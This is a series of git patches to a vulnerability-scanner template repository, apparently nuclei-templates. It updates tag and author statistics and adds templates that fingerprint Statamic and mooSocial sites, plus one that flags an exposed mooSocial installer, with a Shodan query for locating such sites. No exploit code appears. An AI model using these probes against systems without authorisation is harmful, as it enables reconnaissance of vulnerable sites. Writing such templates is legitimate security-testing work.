+| sicom | 1 | | | | | | | | | +| newgrounds | 1 | | | | | | | | | +| atechmedia | 1 | | | | | | | | | +| somansa | 1 | | | | | | | | | +| xuxueli | 1 | | | | | | | | | +| skillshare | 1 | | | | | | | | | +| tripadvisor | 1 | | | | | | | | | +| tildezone-mastodon-instance | 1 | | | | | | | | | +| cory_lamle | 1 | | | | | | | | | +| wpa2 | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| setlistfm | 1 | | | | | | | | | +| iptv | 1 | | | | | | | | | +| sercomm | 1 | | | | | | | | | +| email-subscribers | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| codestats | 1 | | | | | | | | | +| realestate | 1 | | | | | | | | | +| admin-bypass | 1 | | | | | | | | | +| 21buttons | 1 | | | | | | | | | +| jhipster | 1 | | | | | | | | | +| uberflip | 1 | | | | | | | | | +| smartbear | 1 | | | | | | | | | +| newspaper | 1 | | | | | | | | | +| ollama | 1 | | | | | | | | | +| wpwax | 1 | | | | | | | | | +| haraj | 1 | | | | | | | | | +| slurm | 1 | | | | | | | | | +| node-red | 1 | | | | | | | | | +| imgur | 1 | | | | | | | | | +| cvnd2018 | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| freelancetoindia | 1 | | | | | | | | | +| mixi | 1 | | | | | | | | | +| fe | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| gogoritas | 1 | | | | | | | | | +| teradici | 1 | | | | | | | | | +| 1forge | 1 | | | | | | | | | +| fms | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| hanta | 1 | | | | | | | | | +| riskru | 1 | | | | | | | | | +| smartsheet | 1 | | | | | | | | | +| run-parts | 1 | | | | | | | | | +| feedwordpress_project | 1 | | | | | | | | | +| mastodon-101010pl | 1 | | | | | | | | | +| campaignmonitor | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| sync | 1 | | | | | | | | | +| twpro | 1 | | | | | | | | | +| hcpanywhere | 1 | | | | | | | | | +| securimage-wp-fixed_project | 1 | | | | | | | | | +| g5theme | 1 | | | | | | | | | +| fortra | 1 | | | | | | | | | +| netmaker | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| nvrsolo | 1 | | | | | | | | | +| polchatpl | 1 | | | | | | | | | +| icq-chat | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| ubisoft | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| ab_google_map_travel_project | 1 | | | | | | | | | +| hatenablog | 1 | | | | | | | | | +| xproxy | 1 | | | | | | | | | +| oauth2 | 1 | | | | | | | | | +| ultimate-weather_project | 1 | | | | | | | | | +| networkdb | 1 | | | | | | | | | +| voidtools | 1 | | | | | | | | | +| pondol-formmail_project | 1 | | | | | | | | | +| nirweb-support | 1 | | | | | | | | | +| Microsoft | 1 | | | | | | | | | +| acketstorm | 1 | | | | | | | | | +| dss | 1 | | | | | | | | | +| simpel-reserveren_project | 1 | | | | | | | | | +| joomlaserviceprovider | 1 | | | | | | | | | +| page-layout-builder_project | 1 | | | | | | | | | +| gargoyle | 1 | | | | | | | | | +| battlenet | 1 | | | | | | | | | +| alloannonces | 1 | | | | | | | | | +| jmarket | 1 | | | | | | | | | +| hc-custom-wp-admin-url | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| microfinance | 1 | | | | | | | | | +| h-sphere | 1 | | | | | | | | | +| login-as-customer-or-user | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| wildcard | 1 | | | | | | | | | +| ajaydsouza | 1 | | | | | | | | | +| woo-bulk-price-update | 1 | | | | | | | | | +| archibus | 1 | | | | | | | | | +| visual-studio-code | 1 | | | | | | | | | +| xvideos-models | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| bws | 1 | | | | | | | | | +| profilegrid | 1 | | | | | | | | | +| incsub | 1 | | | | | | | | | +| wordpress-support | 1 | | | | | | | | | +| aveva | 1 | | | | | | | | | +| fusion | 1 | | | | | | | | | +| openid | 1 | | | | | | | | | +| twisted | 1 | | | | | | | | | +| tftp | 1 | | | | | | | | | +| envoy | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| easysocialfeed | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| oxid | 1 | | | | | | | | | +| locust | 1 | | | | | | | | | +| pdflayer | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| new-year-firework_project | 1 | | | | | | | | | +| daily-prayer-time-for-mosques | 1 | | | | | | | | | +| dynamic | 1 | | | | | | | | | +| mastown-mastodon-instance | 1 | | | | | | | | | +| orcus | 1 | | | | | | | | | +| filr | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| concourse | 1 | | | | | | | | | +| footprints | 1 | | | | | | | | | +| mstore-api | 1 | | | | | | | | | +| akhq | 1 | | | | | | | | | +| naija-planet | 1 | | | | | | | | | +| hydra | 1 | | | | | | | | | +| js-analyse | 1 | | | | | | | | | +| playsms | 1 | | | | | | | | | +| wp-slimstat | 1 | | | | | | | | | +| objectinjection | 1 | | | | | | | | | +| gzforum | 1 | | | | | | | | | +| csa | 1 | | | | | | | | | +| monstracms | 1 | | | | | | | | | +| icearp | 1 | | | | | | | | | +| learning-management-system | 1 | | | | | | | | | +| collibra-properties | 1 | | | | | | | | | +| instructables | 1 | | | | | | | | | +| lob | 1 | | | | | | | | | +| extplorer | 1 | | | | | | | | | +| pluginbazaar | 1 | | | | | | | | | +| plausible | 1 | | | | | | | | | +| mylittleadmin | 1 | | | | | | | | | +| cx | 1 | | | | | | | | | +| sugar | 1 | | | | | | | | | +| wpovernight | 1 | | | | | | | | | +| mediation | 1 | | | | | | | | | +| ixbusweb | 1 | | | | | | | | | +| seowonintech | 1 | | | | | | | | | +| logstash | 1 | | | | | | | | | +| totemo | 1 | | | | | | | | | +| armorgames | 1 | | | | | | | | | +| intellifuel | 1 | | | | | | | | | +| canto | 1 | | | | | | | | | +| domaincheckplugin | 1 | | | | | | | | | +| zoomeye | 1 | | | | | | | | | +| masteriyo | 1 | | | | | | | | | +| land-software | 1 | | | | | | | | | +| openedx | 1 | | | | | | | | | +| aria2 | 1 | | | | | | | | | +| cdapl | 1 | | | | | | | | | +| idehweb | 1 | | | | | | | | | +| ltrace | 1 | | | | | | | | | +| php_curl_class_project | 1 | | | | | | | | | +| home-assistant | 1 | | | | | | | | | +| mastonyc-mastodon-instance | 1 | | | | | | | | | +| age-gate | 1 | | | | | | | | | +| barracuda | 1 | | | | | | | | | +| mailhog | 1 | | | | | | | | | +| sns | 1 | | | | | | | | | +| je_form_creator | 1 | | | | | | | | | +| user-meta | 1 | | | | | | | | | +| okidoki | 1 | | | | | | | | | +| bws-error-log | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| Blogengine | 1 | | | | | | | | | +| nitely | 1 | | | | | | | | | +| mt | 1 | | | | | | | | | +| cvsweb | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| pmm | 1 | | | | | | | | | +| com_janews | 1 | | | | | | | | | +| extreme | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| shoowbiz | 1 | | | | | | | | | +| rhadamanthys | 1 | | | | | | | | | +| mdc_youtube_downloader_project | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| timeout | 1 | | | | | | | | | +| tbk | 1 | | | | | | | | | +| shutterstock | 1 | | | | | | | | | +| loancms | 1 | | | | | | | | | +| helprace | 1 | | | | | | | | | +| zeta-producer | 1 | | | | | | | | | +| zenrows | 1 | | | | | | | | | +| joommasters | 1 | | | | | | | | | +| emulator | 1 | | | | | | | | | +| 7dach | 1 | | | | | | | | | +| xvideos-profiles | 1 | | | | | | | | | +| atg | 1 | | | | | | | | | +| phoenix | 1 | | | | | | | | | +| webp_converter_for_media_project | 1 | | | | | | | | | +| atvise | 1 | | | | | | | | | +| vision | 1 | | | | | | | | | +| xyxel | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| slackholes | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| contest_gallery | 1 | | | | | | | | | +| give | 1 | | | | | | | | | +| expect | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| simple-membership-plugin | 1 | | | | | | | | | +| easy-digital-downloads | 1 | | | | | | | | | +| wmw | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| greenbone | 1 | | | | | | | | | +| show-all-comments-in-one-page | 1 | | | | | | | | | +| ics | 1 | | | | | | | | | +| xtreamerat | 1 | | | | | | | | | +| zatrybipl | 1 | | | | | | | | | +| caringbridge | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| rg-uac | 1 | | | | | | | | | +| ninja-forms | 1 | | | | | | | | | +| hydra_project | 1 | | | | | | | | | +| microsoft-teams | 1 | | | | | | | | | +| helmet_store_showroom_project | 1 | | | | | | | | | +| readtomyshoe_project | 1 | | | | | | | | | +| tixeo | 1 | | | | | | | | | +| ecommerce-product-catalog | 1 | | | | | | | | | +| pelco | 1 | | | | | | | | | +| parsi-font_project | 1 | | | | | | | | | +| realtyna | 1 | | | | | | | | | +| rumbleuser | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| alcatel | 1 | | | | | | | | | +| nsq | 1 | | | | | | | | | +| digital-ocean | 1 | | | | | | | | | +| federatedpress-mastodon-instance | 1 | | | | | | | | | +| microsoft-technet-community | 1 | | | | | | | | | +| itchio | 1 | | | | | | | | | +| apsystems | 1 | | | | | | | | | +| mongo-express | 1 | | | | | | | | | +| polywork | 1 | | | | | | | | | +| cakephp | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| motioneye | 1 | | | | | | | | | +| hacker-news | 1 | | | | | | | | | +| redv | 1 | | | | | | | | | +| fancentro | 1 | | | | | | | | | +| choom | 1 | | | | | | | | | +| mastodon-mastodon | 1 | | | | | | | | | +| fox | 1 | | | | | | | | | +| bookcrossing | 1 | | | | | | | | | +| litmindclub-mastodon-instance | 1 | | | | | | | | | +| wireclub | 1 | | | | | | | | | +| enterprise | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| cookieinformation | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| guard | 1 | | | | | | | | | +| sri | 1 | | | | | | | | | +| tunefind | 1 | | | | | | | | | +| httpbrowser | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| amentotech | 1 | | | | | | | | | +| webasyst | 1 | | | | | | | | | +| elbtide | 1 | | | | | | | | | +| xwiki | 1 | | | | | | | | | +| playtube | 1 | | | | | | | | | +| powerchute | 1 | | | | | | | | | +| bugcrowd | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| telecom | 1 | | | | | | | | | +| franklin | 1 | | | | | | | | | +| nawk | 1 | | | | | | | | | +| popup-builder | 1 | | | | | | | | | +| webtoprint | 1 | | | | | | | | | +| flatpm | 1 | | | | | | | | | +| kfm_project | 1 | | | | | | | | | +| easyen | 1 | | | | | | | | | +| devalcms | 1 | | | | | | | | | +| phpgedview | 1 | | | | | | | | | +| visser | 1 | | | | | | | | | +| exposed | 1 | | | | | | | | | +| dwsync | 1 | | | | | | | | | +| sexworker | 1 | | | | | | | | | +| flowci | 1 | | | | | | | | | +| affiliates-manager | 1 | | | | | | | | | +| basicrat | 1 | | | | | | | | | +| aaha-chat | 1 | | | | | | | | | +| hivemanager | 1 | | | | | | | | | +| underconstruction_project | 1 | | | | | | | | | +| sunshinephotocart | 1 | | | | | | | | | +| openmediavault | 1 | | | | | | | | | +| trumani | 1 | | | | | | | | | +| kybernetika | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| ipanel | 1 | | | | | | | | | +| pornhub-porn-stars | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| smf | 1 | | | | | | | | | +| linshare | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| clipbucket | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| kmc_information_systems | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| ipdata | 1 | | | | | | | | | +| cpulimit | 1 | | | | | | | | | +| suprema | 1 | | | | | | | | | +| opennebula | 1 | | | | | | | | | +| roboform | 1 | | | | | | | | | +| mx | 1 | | | | | | | | | +| idangero | 1 | | | | | | | | | +| dapr | 1 | | | | | | | | | +| anyscale | 1 | | | | | | | | | +| ovpn | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| scoreme_project | 1 | | | | | | | | | +| clubhouse | 1 | | | | | | | | | +| mail-masta_project | 1 | | | | | | | | | +| furaffinity | 1 | | | | | | | | | +| label-studio | 1 | | | | | | | | | +| hcommonssocial-mastodon-instance | 1 | | | | | | | | | +| thecatapi | 1 | | | | | | | | | +| wget | 1 | | | | | | | | | +| twitcasting | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| jspxcms | 1 | | | | | | | | | +| goodlayerslms | 1 | | | | | | | | | +| pivotal | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| ictprotege | 1 | | | | | | | | | +| liquibase | 1 | | | | | | | | | +| fandalism | 1 | | | | | | | | | +| yelp | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| shirnecms | 1 | | | | | | | | | +| rebuild | 1 | | | | | | | | | +| petfinder | 1 | | | | | | | | | +| jvtwitter | 1 | | | | | | | | | +| eibiz | 1 | | | | | | | | | +| advance-custom-field | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| mapstodonspace-mastodon-instance | 1 | | | | | | | | | +| katz | 1 | | | | | | | | | +| urlscan | 1 | | | | | | | | | +| udraw | 1 | | | | | | | | | +| fark | 1 | | | | | | | | | +| hcl | 1 | | | | | | | | | +| mastodon-rigczclub | 1 | | | | | | | | | +| expressionalsocial-mastodon-instance | 1 | | | | | | | | | +| presspage | 1 | | | | | | | | | +| ogc | 1 | | | | | | | | | +| aiohttp | 1 | | | | | | | | | +| posthog | 1 | | | | | | | | | +| report | 1 | | | | | | | | | +| behance | 1 | | | | | | | | | +| jinhe | 1 | | | | | | | | | +| aa-exec | 1 | | | | | | | | | +| secure-copy-content-protection | 1 | | | | | | | | | +| elasticpot | 1 | | | | | | | | | +| machform | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| microfinance_management_system_project | 1 | | | | | | | | | +| joget | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| blueflyingfish.no-ip | 1 | | | | | | | | | +| gameconnect | 1 | | | | | | | | | +| sandhillsdev | 1 | | | | | | | | | +| pinkbike | 1 | | | | | | | | | +| lucy | 1 | | | | | | | | | +| crystal | 1 | | | | | | | | | +| vgm | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| rackup | 1 | | | | | | | | | +| osu | 1 | | | | | | | | | +| counteract | 1 | | | | | | | | | +| cryptobox | 1 | | | | | | | | | +| snapchat-stories | 1 | | | | | | | | | +| reblogme | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| kipin | 1 | | | | | | | | | +| register | 1 | | | | | | | | | +| servmask | 1 | | | | | | | | | +| couch | 1 | | | | | | | | | +| ocomon | 1 | | | | | | | | | +| openwire | 1 | | | | | | | | | +| wp-paytm-pay | 1 | | | | | | | | | +| cdi | 1 | | | | | | | | | +| amprion | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| jsonbin | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 7b379864a3..a06f58e212 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2435 | dhiyaneshdk | 1262 | http | 7355 | info | 3645 | file | 337 | -| panel | 1123 | daffainfo | 864 | file | 337 | high | 1686 | dns | 25 | -| wordpress | 962 | dwisiswant0 | 803 | workflows | 191 | medium | 1503 | | | -| exposure | 901 | pikpikcu | 353 | network | 136 | critical | 1009 | | | -| xss | 895 | pussycat0x | 349 | cloud | 98 | low | 265 | | | -| wp-plugin | 837 | ritikchaddha | 326 | code | 81 | unknown | 38 | | | +| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | +| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | +| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | +| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | +| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | +| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | | osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 260 | ssl | 29 | | | | | -| lfi | 647 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 602 | geeknik | 230 | dast | 21 | | | | | +| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | +| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | From 6c751fa3ddebec428f58ba6aab10fee47c5849ad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 11:00:05 +0000 Subject: [PATCH 059/375] Auto README Update [Fri May 10 11:00:05 UTC 2024] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 1c86981e3d..61f5f3b16e 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2435 | dhiyaneshdk | 1262 | http | 7355 | info | 3645 | file | 337 | -| panel | 1123 | daffainfo | 864 | file | 337 | high | 1686 | dns | 25 | -| wordpress | 962 | dwisiswant0 | 803 | workflows | 191 | medium | 1503 | | | -| exposure | 901 | pikpikcu | 353 | network | 136 | critical | 1009 | | | -| xss | 895 | pussycat0x | 349 | cloud | 98 | low | 265 | | | -| wp-plugin | 837 | ritikchaddha | 326 | code | 81 | unknown | 38 | | | +| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | +| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | +| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | +| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | +| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | +| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | | osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 260 | ssl | 29 | | | | | -| lfi | 647 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 602 | geeknik | 230 | dast | 21 | | | | | +| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | +| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | -**633 directories, 8625 files**. +**638 directories, 8694 files**. From 6c43f80398e552d386533fa74da33e516e5b69f2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 16:49:20 +0530 Subject: [PATCH 060/375] Create moosocial-installer.yaml --- .../installer/moosocial-installer.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/misconfiguration/installer/moosocial-installer.yaml diff --git a/http/misconfiguration/installer/moosocial-installer.yaml b/http/misconfiguration/installer/moosocial-installer.yaml new file mode 100644 index 0000000000..fcb963e43f --- /dev/null +++ b/http/misconfiguration/installer/moosocial-installer.yaml @@ -0,0 +1,27 @@ +id: moosocial-installer + +info: + name: mooSocial Installation - Exposure + author: ritikchaddha + severity: high + metadata: + verified: true + max-request: 1 + shodan-query: html:"mooSocial Installation" + tags: exposure,moosocial,misconfig,install + +http: + - method: GET + path: + - "{{BaseURL}}/install" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to mooSocial Installation' + + - type: status + status: + - 200 From 5b6673c162b1beb2e93fcf81923ea283a5c42d39 Mon Sep 17 00:00:00 2001 From: idealphase Date: Fri, 10 May 2024 23:09:05 +0700 Subject: [PATCH 061/375] Update favicon-detect.yaml Added mooSocial favicon https://moosocial.com/ --- http/technologies/favicon-detect.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 4ebee77d3f..0f2e2aa252 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -2,7 +2,7 @@ id: favicon-detect info: name: favicon-detection - author: un-fmunozs,DhiyaneshDk + author: un-fmunozs,DhiyaneshDk,idealphase severity: info reference: - https://twitter.com/brsn76945860/status/1171233054951501824 @@ -3736,8 +3736,13 @@ http: dsl: - "status_code==200 && (\"-1728967963\" == mmh3(base64_py(body)))" + - type: dsl + name: "mooSocial" + dsl: + - "status_code==200 && (\"702863115\" == mmh3(base64_py(body)))" + extractors: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 4b0a004830460221008c5613a5a0cf6abacf4895de42c95ec8b316479ea03c21cf335e942cbcf87ccf022100877e480c73ae4cfbba3520153c4792344db60a7b3a44c138faf845db3bd10fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008c5613a5a0cf6abacf4895de42c95ec8b316479ea03c21cf335e942cbcf87ccf022100877e480c73ae4cfbba3520153c4792344db60a7b3a44c138faf845db3bd10fdf:922c64590222798bb761d5b6d8e72950 From c5158ffbe20c7bc1ff684134987bd22cd2a97bc5 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Fri, 10 May 2024 12:31:42 -0500 Subject: [PATCH 062/375] Create statamic-detect.yaml Add new detection template for Statamic CMS --- http/technologies/statamic-detect.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 http/technologies/statamic-detect.yaml diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml new file mode 100644 index 0000000000..9b5d841b29 --- /dev/null +++ b/http/technologies/statamic-detect.yaml @@ -0,0 +1,20 @@ +id: statamic-detect + +info: + name: Statamic Detection + description: Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites. + reference: https://github.com/statamic/cms + author: geeknik + severity: info + tags: tech,statamic + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - 'X-Powered-By: Statamic' From 3978e6cf80631aec5aa198e6b7f2c057527354d1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 11 May 2024 09:28:34 +0000 Subject: [PATCH 063/375] Auto Generated New Template Addition List [Sat May 11 09:28:34 UTC 2024] :robot: --- .new-additions | 66 +------------------------------------------------- 1 file changed, 1 insertion(+), 65 deletions(-) diff --git a/.new-additions b/.new-additions index ed15c7d37d..6adb054b53 100644 --- a/.new-additions +++ b/.new-additions @@ -1,65 +1 @@ -http/cves/2015/CVE-2015-4455.yaml -http/cves/2019/CVE-2019-7139.yaml -http/cves/2023/CVE-2023-1892.yaml -http/cves/2023/CVE-2023-2227.yaml -http/cves/2023/CVE-2023-27032.yaml -http/cves/2023/CVE-2023-2948.yaml -http/cves/2023/CVE-2023-2949.yaml -http/cves/2023/CVE-2023-31446.yaml -http/cves/2023/CVE-2023-32077.yaml -http/cves/2023/CVE-2023-38964.yaml -http/cves/2023/CVE-2023-43208.yaml -http/cves/2023/CVE-2023-44812.yaml -http/cves/2023/CVE-2023-4521.yaml -http/cves/2023/CVE-2023-45375.yaml -http/cves/2023/CVE-2023-46347.yaml -http/cves/2023/CVE-2023-4973.yaml -http/cves/2023/CVE-2023-5003.yaml -http/cves/2023/CVE-2023-6389.yaml -http/cves/2023/CVE-2023-6989.yaml -http/cves/2024/CVE-2024-0235.yaml -http/cves/2024/CVE-2024-0881.yaml -http/cves/2024/CVE-2024-1183.yaml -http/cves/2024/CVE-2024-22927.yaml -http/cves/2024/CVE-2024-2340.yaml -http/cves/2024/CVE-2024-23917.yaml -http/cves/2024/CVE-2024-24131.yaml -http/cves/2024/CVE-2024-27956.yaml -http/cves/2024/CVE-2024-2876.yaml -http/cves/2024/CVE-2024-3136.yaml -http/cves/2024/CVE-2024-31621.yaml -http/cves/2024/CVE-2024-31848.yaml -http/cves/2024/CVE-2024-31849.yaml -http/cves/2024/CVE-2024-31850.yaml -http/cves/2024/CVE-2024-31851.yaml -http/cves/2024/CVE-2024-32399.yaml -http/cves/2024/CVE-2024-32640.yaml -http/cves/2024/CVE-2024-32651.yaml -http/cves/2024/CVE-2024-33575.yaml -http/cves/2024/CVE-2024-33724.yaml -http/cves/2024/CVE-2024-4040.yaml -http/cves/2024/CVE-2024-4348.yaml -http/default-logins/crushftp/crushftp-anonymous-login.yaml -http/default-logins/crushftp/crushftp-default-login.yaml -http/default-logins/soplanning/soplanning-default-login.yaml -http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml -http/exposed-panels/bonobo-server-panel.yaml -http/exposed-panels/cassia-bluetooth-gateway-panel.yaml -http/exposed-panels/cyberchef-panel.yaml -http/exposed-panels/femtocell-panel.yaml -http/exposed-panels/monitorr-panel.yaml -http/exposed-panels/openwebui-panel.yaml -http/exposed-panels/teamforge-panel.yaml -http/exposed-panels/tixeo-panel.yaml -http/exposed-panels/umami-panel.yaml -http/misconfiguration/installer/eyoucms-installer.yaml -http/misconfiguration/installer/sabnzbd-installer.yaml -http/misconfiguration/microsoft/ms-exchange-local-domain.yaml -http/misconfiguration/titannit-web-exposure.yaml -http/takeovers/squadcast-takeover.yaml -http/vulnerabilities/citrix/citrix-oob-memory-read.yaml -http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml -http/vulnerabilities/titan/titannit-web-rce.yaml -http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml -network/detection/aix-websm-detect.yaml -network/detection/bluecoat-telnet-proxy-detect.yaml +http/misconfiguration/installer/phpmyfaq-installer.yaml From 9b62de76cce5837247995f5f6e6c5df4adf8b171 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 09:28:39 +0000 Subject: [PATCH 064/375] Auto Generated Templates Checksum [Sat May 11 09:28:39 UTC 2024] :robot: --- templates-checksum.txt | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b46a6a2fef..2b7a03afae 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:70736c6faaf92554e4711d1ccdb709abe1ccfb0d +README.md:6c60460e1b0f948b5ee382edcedf044ba5aff856 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:dd9a2992caeffaa53bbda5f3166a5f2df1dc3210 -TEMPLATES-STATS.md:47130017e50921075ff79d152501d5e3ac88eb0b -TOP-10.md:19dc2fecaf3933fe8c0c250b8c2ebfa0fa89854c +TEMPLATES-STATS.json:f43402ca0284acc690f4d239afd477488d220182 +TEMPLATES-STATS.md:7d758b52f7d1c73e19018bddb902f0076bd4a867 +TOP-10.md:3e73524df2b18729f1e3def717dac5e973708c14 cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f cloud/aws/acm/acm-cert-renewal-30days.yaml:a90f78e355c103211f113d112ced769e7a0297a2 cloud/aws/acm/acm-cert-renewal-45days.yaml:31dd523c386a3e2fce9e6882f0bd6eadcb5d9527 @@ -3273,12 +3273,12 @@ http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d -http/cves/2024/CVE-2024-31621.yaml:a8be34655c70d85af9a56ca6f57228c1c0cd0b78 +http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf -http/cves/2024/CVE-2024-32399.yaml:73046107ec5e2333ffbfbc9048afe6d20f6401ac +http/cves/2024/CVE-2024-32399.yaml:afc357068e3f6e9ef3aa6910a122ee7bd47ac60d http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 